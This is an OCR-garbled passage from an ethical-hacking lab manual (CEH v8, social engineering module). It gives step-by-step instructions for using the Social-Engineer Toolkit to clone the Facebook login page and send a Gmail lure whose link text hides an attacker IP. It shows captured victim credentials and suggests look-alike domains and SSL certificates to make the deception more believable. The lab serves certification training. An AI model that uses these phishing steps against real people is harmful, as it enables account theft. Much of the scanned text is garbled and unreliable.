h a t IP th e s e rv e r w i l l POST to .

[ • ] C re d e n tia l h a rv e s te r w i l l a l lo w you to

Jr> 1 T JT[ ־ ] to h a rv e s t c r e d e n t ia ls o r pa ram ete rs f

3r Arom a w e b s ite as w e l l as p la c e them i r

to a r e p o r t I ^ ■ % I % ■ I V J 1[-] T h is o p t io n i s used f o r | h a t IP th e s e rv e r w i l l POST t o . V ^ M [■ ] I f y o u 'r e u s in g an e x te r n a l IP , use y o u r e x te r n a l IP f o r t h i s s e t : w e b a tta ck> IP add ress f o r th e POST back in H a rv e s te r /T a b n a b b in g :1 0 .0 .0 .1 5 [ • ] SET s u p p o rts b o th HTTP and HTTPS[ - ] Example: h t t p : //w w w . t h is i s a f a k e s i t e . com____________; e t :w e b a tta ck> E n te r th e u r l to c lo n e :Rvww. fa c e b o o k . com!

F IG U R E 3.8: Providing U R L to be cloned

10. Alter cloning is completed, the highlighted message, as shown 111 die following screenshot, will appear on the T e rm in a l screen ot SET. Press E n te r to continue.

11. It will start Credential Harvester.



s e t :w e b a tta c k >2 51[ -1 C re d e n tia l h a rv e s te r w i l l a l lo w you to u t i l i z e th e c lo n e c a p a b i l i t ie s w i th in SET

[ - ] to h a rv e s t c r e d e n t ia ls o r pa ram ete rs from a w e b s ite as w e l l as p la c e them in to a re p o r t[ - ] T h is o p t io n i s used f o r what IP th e s e rv e r w i l l POST to . t - J I f y o u 'r e u s in g an e x te rn a l IP , use y o u r e x te r n a l IP f o r t h is s e t :w e b a tta c k > IP add ress f o r th e POST back in H a rv e s te r /T a b n a b b in g :1 0 .0 .0 .1 5 { - ] SET s u p p o rts bo th HTTP and HTTPSI - ] Example: h t tp : / /w w w . th is is a fa k e s ite .c o m Is e t : w e b a tta c k > E n te r th e u r l to c lo n e :ww w.facebook.com

b ■ . —ך[ * ] C lo n in g th e w e b s ite : h t tp s : / / lo g in . fa c e b o o k .c o m / lo g in .p h p [ * j T h is c o u ld ta k e a l i t t l e b i t . . . 1 I J

fokc -י ,

POSTs on a w e b s ite .Trie b e » « v Ttoaie fteu ■tfm.k i J 11f ie l d s a re a v a i la b le . R e g a rd le ss , K h i [ ! ] I have read th e above message.

to c o n t in u ePress < re tu r i

F IG U R E 3.9: SET Website Cloning

12. Leave the Credential Harvester Attack to fetch information from the victim’s machine.

C Q t 11 e web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature to version 0.7.

1333 If you ’re doing apenetration test, register a name that’s similar to the victim, for Gmail you could do gmail.com (notice the 1), something similar diat can mistake the user into thinking it’s die legitimate



http://www.thisisafakesite.com



* Terminal File Edit View Terminal Help[-] Credential harvester w i l l allow you to u t i l iz e the clone cap ab ilit ie s within SET

[-] to harvest credentials or parameters from a website as w ell as place them in to a report — —[■] This option is used for what IP the server w i l l POST to. _ * a * * '[-] I f you're using an external IP , use your external IP fo r th iss e t:webattack> IP address for the POST back in H a rve s te r/T a b n ab b in g :lf^ ^ ^ ^ ^[-] SET supports both HTTP and HTTPS[-1 Example: http://www.thisisafakesite.comse t:webattack> Enter the u rl to clone:www.facebook.com

[*] Cloning the website: https://login.facebook.com/login.php [*j This could take a l i t t l e b i t . . .

password torm POSTs A a webs

sername and ftptures al

The beat way to use th is a ttack i » i f f ie ld s ftrg ava ilab le . R e jrd le s s . ■hi l ! ] I have read the above message.

Press to continue׳ ] Social-Engineer Toolkit Credential Harvester Attack , j Credential Harvester is running on port 80 ■] Information w i l l be displayed to you as i t a rrives below:

FIG U RE 3.10: SET Credential Harvester Attack

13. N o w , y o u h a v e to se n d th e IP a d d r e s s o f y o u r B a c k T ra c k m a c h in e to a v ic tim an d tr ick h im o r h e r to c l i c k to b r o w s e th e IP ad d ress .

14. F o r tin s d e m o , la u n c h y o u r w e b b ro w se r 111 th e B a c k T ra c k m a c h in e ; la u n c h y o u r fav o rite em ail serv ice. 1 1 1 th is e x am p le w e h a v e u se d w w w .g m a i l .c o m . L o g in to y o u r gm ail a c c o u n t a n d c o m p o s e an em ail.

FIG U RE 3.11: Composing email in Gmail

1 e em ail w h e re y o u w ish to p lace th e

icon .C O

15. P lace th e c u rs o r 111 th e b o d y o f t

fake U R L . T h e n , click th e L ink

m When you hover over the link, die URL will be presented with the real URL, not the attacker’s machine. So for example if you’re cloning gmail.com, the URL when hovered over it would be gmail.com. When the user clicks the moved link, Gmail opens and then is quickly replaced with your malicious Webserver. Remember you can change the timing of the webjacking attack in die config/set_config flags.

0=5! Most of the time they won’t even notice the IP but it’s just another way to ensure it goes on without a hitch. Now that the victim enters the username and password in die fields, you will notice that we can intercept the credentials now.



http://www.thisisafakesite.com


https://login.facebook.com/login.php

http://www.gmail.com


flma1l.com * Gmail • Mozilla Firetox< • (9 ־ »— Compose Mail אEjle Edit yiew History flook marks Ipols Help

T C | 121▼ Google Q,S' ן fi http״ google.com/n il,

|BackTrack Lnux Hotfe nsiwe Security |lExploit־DB Âircrack-ng J^SomaFMGmail Documents Calendar More •

0 + Share

oG 0 v g׳ le

Discard Lab«h־» Draft autosaveti at 10:4a AM (0 minutes ago)

° - [email protected], IAdd Cc Add Bcc

Su bject @TOI F - Party PicturesAttach a no

rT * A ־ B I y T ־ © ־ T ־ [oo|t= IE •5 i* 5 * sיי ^ 1% • Plain Toxt chock spoiling■״

Hoilo Sam.PI»4m» click this link lo view U>*♦ w»#»kt»11d (vtrty picture* at TGIF wflh thw cmMxMim*Regards.m.

InboxSUrrwJImportantSert Mail Drafts (2)

► Circles

Search chat or SU'9»י

FIG U RE 3.12: Linking Fake URL to Actual URL

16. 111 th e E d it L ink w in d o w , firs t type d ie a c tu a l ad d re ss 111 th e W eba d d r e s s fie ld u n d e r th e L ink to o p tio n a n d th e n ty p e d ie fake U R L 111

d ie T e x t to d is p la y he ld . 111 th is ex am p le , th e w e b ad d re s s w e h av e u se d is h ttp :/ / 1 0 .0 .0 .1 5 a n d te x t to d isp lay is w w w .fa c e b o o k .c o m /R in i TGIF. C lick OK

g)gmail.com - Gmail • Mozilla Firetox) ־ ■■»>■« ■■•■ . ן Compose Mail ׳־י אtile Edit yiew History flook marks !pols Help

▼ © If lr Google Q.Compose Mail *

3 !5״ ■ rap־ • googie.com |BackTrack Lnux ensiwe Security ||Fxploit־DB Âircrack-ng j^r>omaFM

I MC

»Rlni Search Images Maps Play YouTube

G o .)g IeDraft eutosaved at 10:45 AM (0 minutes ago)

Edit LinkX

Toxt to aiepiay: L w (V facebook com/Rini TG1f ] QUr* to. To what URL should this link go?0 Web address |wtp0.0.15 10׳/־ |QC Email ***יי•־ Th>I (1י|ז IK*

Not »ure wrhat to put In the boxT rm fhd t**■ imge an the t*ob fat you wanr to Ink to (A scarc heroine mottt be useful.) Then ceoy 1־e ate address *rom the box h your browser's addroso Qor and potto it 140 tno box aoov•

| OK | Cancel

InboxStarred Important Sent Mai Drafts (2) Circles JunkE-mal

FIG U RE 3.13: Edit Link window

17. T h e fake U R L sh o u ld a p p e a r 111 th e em ail b o d y , as s h o w n 111 th e fo llo w in g sc reen sh o t.




http://10.0.0.15

http://www.facebook.com/Rini


......... —« ־ Compose Mail א • (g>gma1l.com * Gmail • Mozilla FirefoxEjle Edit History flook marks Ipols Help

gBackTrack Linux |*|Offensive Security |[JjExploit-DB Âircrack-ng jgjjSomaFM

Saved Discard Labels •»־ Draft autnsaved at 11:01 AM (0 minutes ago) 0־

To @yahoo com, BAdd Cc Add Bcc

Subjed ©TGIF- Party PicturesAttach a 10 ת

Sf ־ B I U T - »T - A, • T - © oo | - IE 3 i s H « =3 ^ , piain roxt chock spoiling■'

Hello Sam.

Pt-*M» click this Ilfikj www t:<m1.Rlnl TfilFjlo vlt״w II*- parly picture at TGIF with th* ceMvttlMKoqaroe.

G 0 v g׳ le

InboxSUrred Important Serf Mail Drafts (2)

► Circles

Search 1

9*

c a The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all die information posted to the website.

FIG U RE 3.14: Adding Fake URL in the email content

18. T o v e rity th a t th e fake U R L is lin k ed to d ie ac tu a l U R L , c lick th e fake U R L a n d it w ill d isp lay th e ac tu a l U R L as G o to lin k : w ith th e ac tu a l U R L . S en d th e em ail to th e in te n d e d u se r.

rg| |>|t r.ocinle Q, £

x Compose Mail - • • -• ipgmml.com - Gmail • Mozilla Firefox •־File £d1t y ie* History gookmarks !0015 ftelp

M Compose Mail -

V 5r' oogle.com

+ Share F I

0•

A Track Linux |£Offensive Security |lExploit-DB JÂircrack-ng fefiSomaFM

G o u g leages Maps Play YouTube

Discard Labels » Draft autosaved at 11:01 AM (0 minutes ago)

@yahoo.c Add Cc Add Bcc

Sucject @TGi F - Party Pictures Attach a no

מ ■ B I U T • tT * A ־ ז • © M jE IE •= 1 M ׳ E = 1 /x « Plain Text Check Spelling-

Please click this link ww\v.facebook.CQfr!<Rini TGIF 10 view the wee*end party pictures at TGIF with the celebrities rcpgjrcfc | Go to link. htlp:f/10.0.0.1y - Chanoo Remove y |

InboxStarred Important Serf Ms Drafts (2) Circles JunkE-mal

FIG U RE 3.15: Actual URL linked to Fake URL

19. W h e n th e v ic tim clicks th e U R L , h e o r she w ill b e p re s e n te d w ith a rep lica o f F a c e b o o k .c o m

20. T h e v ic tim w ill b e e n tic e d to e n te r 111s o r h e r u se r n a m e a n d p a ss w o rd in to th e fo rm fields as it a p p e a rs to b e a g e n u in e w eb site . W h e n th e v ic tim e n te rs th e U s e rn a m e a n d P a s s w o r d a n d clicks L og In, it d o e s n o t a llow lo g g in g in ; in s te a d , it re d ire c ts to th e leg itim a te F a c e b o o k lo g in page . O b se rv e th e U R L in th e b ro w ser.

m L i some cases when you’re performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes die attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the W EBATTACK_SSL to ON. If you want to use self-signed certificates you can as well however there will be an “untrusted” warning when a victim goes to your website

C EH Lab Manual Page 698 Ethical Hacking and Countenneasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.]


facebookSign Up Connect and share with the people in your Ife.

Tarpbook 1 ogin

(mart or t*hon*:Password: ----

| 1 Keep me lowed inor Siga up for tacetoook

Forgot your osss*vord?

[ranee)־ aa) Pancaic־US] !kwo fflOj®Oge =33and Rrtugjes (=t) ־fcngist

F3Lcb5x S 2012 Moble ־ Find Friends ־ Eodces People ־ Poqcs Afccut Crca* er Ad Create a Page ־ Developers Careers ־ Privacy Coatses Terre

mQ log1n|h>c«book \H C ־> 1 S|hnp3:;;www.face&oolccom/10gm.php| \ 1| Do you want Google Chrome to save your password? | Save password Never for this site •<

facebookSkjii Up CuarMH.1 and slur** with the ptMipk* 111 your lit*.

Facebook Login

Emai or Phone; |Password:

□ Keep me logged m

c» Sum upforTaccbook

Forgot rout D»s*crcP

Cnglah (US] VMI *In-JI Ov/u &Aj<BD£« [xa'd Fwtu«je» OwO r־arKab (France)

Ftctboot e 2012 *ook«c • !*rr!_ 4 ׳ ar Ad Craaca a P*g« - L'«/*cp«rc - Lar**rc - !*rvacy1׳*Batigcc - ■«pl« - Hg*c - Afccut j ׳ hind i-n*ndc ׳ *ModI

mFIG U RE 3.16: Fake and Legitimate Facebook login page

21. A s so o n th e v ic tim ty p es 111 th e em ail ad d re s s a n d p a ss w o rd , th e SE T T e rm in a l 111 B a c k T ra c k fe tc h e s th e ty p e d u s e r n a m e a n d p a ss w o rd , w h ic h c a n b e u se d by an a tta c k e r to g am u n a u th o r iz e d access to th e v ic t im ’s a c c o u n t.

m Hie multi-attack vector allows you to turn on and off different vectors and combine the attacks all into one specific webpage. So when the user clicks the link he will be targeted by each of the attack vectors you specify. One tiling to note with the attack vector is you can’t utilize Tabnabbing, Cred Harvester, or Web Jacking with the Man Left in the Middle attack.

m The multi attack vector utilizes each combination of attacks and allows the user to choose the method for the attack. Once you select one of the attacks, it will be added to your attack profile to be used to stage die attack vector. When you’re finished be sure to select the I ’m finished' option.




* v x TerminalFile Edit View Terminal Help

[*] Social-Engineer Toolkit Credential Harvester Attack.[* j Credential Harvester is running on port 80 [*j Information will be displayed to you as i* ״ץי~י--י hrl"“־ — 10.0.0.2 - - [26/Sep/2012 11:10:41] “GET / HTTP/1.1“ 200 - [* ] WE GOT A HIT! Prin ting the output:PARAM: lsd=AVqgmkGh PARAM: return session=0 PARAM: legacy return=l PARAM: display־PARAM: session key only=0 PARAM: trynu!n=l

lo«.n=Log+In HIT CONTROL-C TO GENERATE A REPORT.

charset test=€, ׳fl,€timezone=-330 lgnrnd=224034 ArY/U

POSSIBfe p J^ n m |F K L D F * % ) : PARAM: default persistent=־QPOSSIBLE USERNAME FIELD FOUND:[ י ] WHEN YOU'RE FINISHED,

PARAMPARAMPARAMPARAM0OSSI

FIG U RE 3.17: SET found Username and Password

22. P re ss CTRL+C to g e n e ra te a r e p o r t to r th is a tta c k p e rfo rm e d .

/v v x TerminalFile Edit View Terminal Help

PARAM: lsd=AVqgmkGh PARAM: return session=0 PARAM: legacy return=l PARAM: display־PARAM: session key only=0 PARAM: trynu1»=lPARAM: charset test=€,/K ,fl,€PARAM: tiraezone=-540 PARAM: Ignrnd=224034 ArYA PARAM: lgnjs=nPOSSIBLE USERNAME FIELD FOUND: emai l ־ —׳ '• POSSIBLE PASSWORD FIELD FOUND: pass=test PARAM: default persistent=0 POSSIBLE USERNAME FIELD FOUND: l 0 gin=L0 g+In [* ] WHEN YOU'RE FINISHED-HIT C0N1R0L-C TO

L . I x'C[*] ftle exported to r Jwkts/20®-09-fc 15::49:15.S4ftl5.lf»L for yourRasnMr w i W I V W l WA V f I X ך- [•] File in XML format exported t(| reports/2012-09-26 15:49:15.5464l .x jr reading pleasure...

C TO GENERATE A REPOftf.

ts/20K-09-26 1H IE * *

to continuePress <retur1

FIG U RE 3.18: Generating Reports through SET

L a b A n a ly s is

m Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer; the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list.

m The multi-attack will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

A nalyze an d d o c u m e n t d ie results re la ted to d ie lab exercise.




T o o l / U t i l i t y I n f o r m a t io n C o l l e c t e d / O b j e c t i v e s A c h ie v e d

P A R A M : lsd= A V qgm kG 11

P A R A M : re tu rn _ s e s s io n = 0

P A R A M : leg a c y _ re tu rn = 1

P A R A M : d is p la y s

P A R A M : se s s io n _ k e y _ o n ly = 0S o c ia l

E n g i n e e r i n gT o o lk i t

P A R A M : trv n u m = 1

P A R A M : c h a rs e t_ te s t= € ,',€ , ',

P A R A M : tim e z o n e = -5 4 0

P A R A M : lg n r n d = 2 2 4 0 3 4 _ A rY A

P A R A M : lg n js = n

em a 1 1= sa m c h o a n g @ y a h o o .c o m

p a s s = te s t@ 1 2 3

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S

R E L A T E D T O T H I S L A B .

Q u e s tio n s

1. E valuate each o f th e fo llow ing P aro s p ro x y op tions:

a. T ra p R equest

b. T ra p R esp o n se

c. C o n tin u e b u tto n

d. D ro p b u tto n

I n t e r n e t C o n n e c t i o n R e q u i r e d

0 Y e s □ N o

P la t f o r m S u p p o r t e d

0 C la s s r o o m □ !L abs




Technology

Ceh v8 labs module 09 social engineering